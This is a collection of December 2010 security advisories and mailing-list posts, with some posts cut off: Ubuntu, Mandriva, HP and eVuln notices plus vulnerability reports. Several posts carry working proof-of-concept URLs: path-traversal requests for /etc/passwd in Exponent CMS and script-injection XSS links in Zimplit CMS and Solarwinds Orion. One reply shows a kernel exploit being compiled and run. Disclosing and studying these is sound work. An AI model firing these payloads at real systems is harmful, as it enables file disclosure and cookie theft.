      Size/MD5:   176812 5c481bdd3bc77b3adf34a4c2ca0bb0c4

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb
      Size/MD5:  1429790 627ff519d970da5963b736d4d7fbbbae
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb
      Size/MD5:   173816 70d728448f29e68a2340e6a9af7bbbea
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb
      Size/MD5:   209622 24cab5c3f87dcafb4d249a2dacecc8b6
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb
      Size/MD5:  4019304 98323a0c914e381a0e0bc8068b9997c1
    http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb
      Size/MD5:  1212736 f6275b43bd2ecc4c629057032bcce788
    http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb
      Size/MD5:   173490 a1a50335c07d3cd4da0e164a77b786ec

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb
      Size/MD5:  1421674 4ea7f22d519d1073667a36c82843316a
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb
      Size/MD5:   170594 d6112fb2191fe51be397e0ce54f84d62
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb
      Size/MD5:   212186 d079bcfe815abe5998bb8d40fa6587ef
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb
      Size/MD5:  4057610 c53e03fcd2bfd4353832edd729717ceb
    http://ports.ubuntu.com/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb
      Size/MD5:  1218594 3d83c5a0aad2a4f5ef33b716f0366d1d
    http://ports.ubuntu.com/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_lpia.deb
      Size/MD5:   174990 a925be46501da63050d875561d603b5c

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ub
www.eVuln.com : HTTP Response Splitting in WWWThreads (php version)
www.eVuln.com advisory: HTTP Response Splitting in WWWThreads (php version)
Summary: http://evuln.com/vulns/156/summary.html
Details: http://evuln.com/vulns/156/description.html

--- Summary ---
eVuln ID: EV0156
Software: n/a
Vendor: WWWThreads
Version: 2006.11.25
Critical Level: low
Type: HTTP Response Splitting
Status: Unpatched. No reply from developer(s)
PoC: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu ( http://evuln.com/ )

--- Description ---
The $_SERVER["HTTP_REFERER"] value is included in an HTTP response header sent to a web user without being validated for malicious characters.
Vulnerable script: reputation.php

--- PoC/Exploit ---
PoC code is available at: http://evuln.com/vulns/156/exploit.html

--- Solution ---
Not available

--- Credit ---
Vulnerability discovered by Aliaksandr Hartsuyeu
http://evuln.com/sql-injection/cookie.html - recent advisories about sql injections in cookies
[USN-1027-1] Quagga vulnerabilities
=== Ubuntu Security Notice USN-1027-1
December 07, 2010
quagga vulnerabilities
CVE-2010-2948, CVE-2010-2949
===

A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 6.06 LTS: quagga 0.99.2-1ubuntu3.7
Ubuntu 8.04 LTS: quagga 0.99.9-2ubuntu1.4
Ubuntu 9.10: quagga 0.99.13-1ubuntu0.1
Ubuntu 10.04 LTS: quagga 0.99.15-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

Details follow:
It was discovered that Quagga incorrectly handled certain Outbound Route Filtering (ORF) records. A remote authenticated attacker could use this flaw to cause a denial of service or potentially execute arbitrary code. The default compiler options for Ubuntu 8.04 LTS and later should reduce the vulnerability to a denial of service. (CVE-2010-2948)

It was discovered that Quagga incorrectly parsed certain AS paths. A remote attacker could use this flaw to cause Quagga to crash, resulting in a denial of service. (CVE-2010-2949)

Updated packages for Ubuntu 6.06 LTS, Ubuntu 8.04 LTS and Ubuntu 9.10:
[USN-1026-1] Python Paste vulnerability
=== Ubuntu Security Notice USN-1026-1
December 07, 2010
paste vulnerability
CVE-2010-2477
===

A security issue affects the following Ubuntu releases:
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 10.04 LTS: python-paste 1.7.2-4ubuntu1.2

In general, a standard system update will make all the necessary changes.

Details follow:
It was discovered that Python Paste did not properly sanitize certain strings, resulting in cross-site scripting (XSS) vulnerabilities. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data, within the same domain.

Updated packages for Ubuntu 10.04 LTS:
[security bulletin] HPSBMI02614 SSRT100344 rev.1 - HP webOS Contacts Application, Remote Execution of Arbitrary Code
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02639302
Version: 1

HPSBMI02614 SSRT100344 rev.1 - HP webOS Contacts Application, Remote Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2010-12-06
Last Updated: 2010-12-06

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP webOS Contacts Application. This vulnerability could be exploited to execute arbitrary HTML or JavaScript.

References: CVE-2010-4109

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP webOS 1.4.5

BACKGROUND

CVSS 2.0 Base Metrics
===
Reference: CVE-2010-4109
Base Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Base Score: 6.8
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION
The vulnerability can be resolved by updating affected devices to HP webOS version 2.0 or subsequent. This update will be provided automatically from the wireless carrier.

Note: Until the update is available, users are advised to not open untrusted vCard files received via emails or messages.

HISTORY
Version:1 (rev.1) - 6 December 2010 Initial Release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-al...@hp.com
Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damag
[ MDVSA-2010:249 ] clamav
Mandriva Linux Security Advisory MDVSA-2010:249
http://www.mandriva.com/security/

Package: clamav
Date: December 7, 2010
Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0

Problem Description:
Multiple vulnerabilities were discovered and corrected in clamav:

Multiple unspecified vulnerabilities in pdf.c in libclamav in ClamAV before 0.96.5 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document (CVE-2010-4260, CVE-2010-4479).

Off-by-one error in the icon_cb function in pe_icons.c in libclamav in ClamAV before 0.96.5 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors. NOTE: some of these details are obtained from third party information (CVE-2010-4261).

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated clamav packages have been upgraded to the 0.96.5 version that is not vulnerable to these issues.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4260
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4261
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4479

Updated Packages (Mandriva Linux 2009.0, Corporate 4.0, Mandriva Enterprise Server 5):
LFI in Exponent CMS
Vulnerability ID: HTB22718
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms_1.html
Product: Exponent CMS
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ )
Vulnerable Version: 2.0.0pr2
Vendor Notification: 22 November 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/rss.php" script to properly sanitize user-supplied input in the "module" variable.

The following PoC is available:
http://exponent/rss.php?module=../../../../../../../etc/passwd%00
Re: [Full-disclosure] Linux kernel exploit
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote:
> > Anyone tested this in sandbox yet?
>
> 00:37 linups:../expl/kernel > cat /etc/*release*
> openSUSE 11.3 (i586)
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.

openSUSE 11.2 and 11.3 do not have ECONET compiled, openSUSE 11.1 has ECONET, but not the 0 ptr deref issue. The CVE-2010-4258 problem is however in all openSUSEs.

Temporary workaround (for all distributions, not just openSUSE):

echo 1 > /proc/sys/kernel/panic_on_oops

This will now panic the machine instead of making it exploitable.

Ciao, Marcus
Multiple XSS in Solarwinds Orion NPM 10.1
Values placed in the URI of the browser are rendered correctly. Orion NPM 10.1 has just been released, so there is no known fix available as of yet.

Examples:

Most "variable=" that I've checked are vulnerable:

http:///Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-2312700225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http:///Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E

http:///Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&I:100&view=InterfaceDetails

http:///Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=

If you need more information please let me know. Is there a template I should fill out for these reports?

If this is published, please publish under x0skel and NOT my name.

Thanks,
John
[ MDVSA-2010:248 ] openssl
Mandriva Linux Security Advisory MDVSA-2010:248
http://www.mandriva.com/security/

Package: openssl
Date: December 7, 2010
Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0

Problem Description:
A vulnerability was discovered and corrected in openssl:

OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of an unintended cipher via vectors involving sniffing network traffic to discover a session identifier (CVE-2010-4180).

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been patched to correct this issue.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4180

Updated Packages (Mandriva Linux 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5):
LFI in Exponent CMS
Vulnerability ID: HTB22717
Reference: http://www.htbridge.ch/advisory/lfi_in_exponent_cms.html
Product: Exponent CMS
Vendor: http://www.exponentcms.org/ ( http://www.exponentcms.org/ )
Vulnerable Version: 2.0.0pr2
Vendor Notification: 22 November 2010
Vulnerability Type: Local File Inclusion
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
The vulnerability exists due to failure in the "/podcast.php" script to properly sanitize user-supplied input in the "module" variable.

The following PoC is available:
http://exponent/podcast.php?module=../../../../../../../etc/passwd%00
XSS vulnerability in Zimplit CMS
Vulnerability ID: HTB22715
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zimplit_cms.html
Product: Zimplit CMS
Vendor: Zimplit ( http://www.zimplit.com/ )
Vulnerable Version: Current at 22.11.2010 and Probably Prior Versions
Vendor Notification: 22 November 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "zimplit.php" script on "load" action to properly sanitize user-supplied input in the "file" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability.

The following PoC is available:
http://host/path/zimplit.php?action=load&file=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
XSS vulnerability in Zimplit CMS
Vulnerability ID: HTB22716
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_zimplit_cms_1.html
Product: Zimplit CMS
Vendor: Zimplit ( http://www.zimplit.com/ )
Vulnerable Version: Current at 22.11.2010 and Probably Prior Versions
Vendor Notification: 22 November 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the manual page to properly sanitize user-supplied input in the "client" variable.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability.

The following PoC is available:
http://host/path/English_manual_version_2.php?client=c%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E